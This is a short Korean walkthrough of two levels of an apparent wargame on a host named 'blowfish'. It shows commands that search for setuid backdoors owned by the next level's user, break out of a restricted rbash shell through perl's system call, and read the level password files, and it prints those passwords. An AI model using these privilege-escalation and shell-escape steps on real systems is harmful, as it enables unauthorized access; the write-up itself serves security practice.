Level2에 접속하여 README 파일을 읽어보면 다음과 같다.
There is a backdoor to the next level hidden somewhere on this system, find it, and get the pass for level3 from /pass/level3
풀이를 하면 다음과 같다.
level2@blowfish:~$ find / -user level3 -perm +4000 2>/dev/null
/usr/bin/false
level2@blowfish:~$ /usr/bin/false
Stand-alone shell (version 3.7)
> cat /pass/level3
l3thal_Rul3Z!-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
Level3에 접속하여 README 파일을 읽어보면 다음과 같다.
You are in a restricted shell. If you can break out of it, you need to find the backdoor hidden somewhere in the system. find it and cat /pass/level4
우선 접속을 해보면 모든 명령어가 막혀 있으며 쉘이 rbash 로 등록되어 있음을 알 수 있다. 따라서 사용 가능한 명령어를 확인해 보다가 perl 명령어가 사용가능한 것을 확인한 후 sh 쉘을 실행하여 find 명령어를 통해 다음 레벨로 넘어갈 수 있는 파일을 찾을 수 있었다.
level3@blowfish:~$ perl -e 'print A\n'
A
level3@blowfish:~$ perl -e 'system /bin/sh'
sh-3.2$ /usr/bin/find / -user level4 -perm +4000 2>/dev/null
/home/level3/.. /cat_lvl4
sh-3.2$ /home/level3/.. /cat_lvl4
n3xt_l3v3l!
sh-3.2$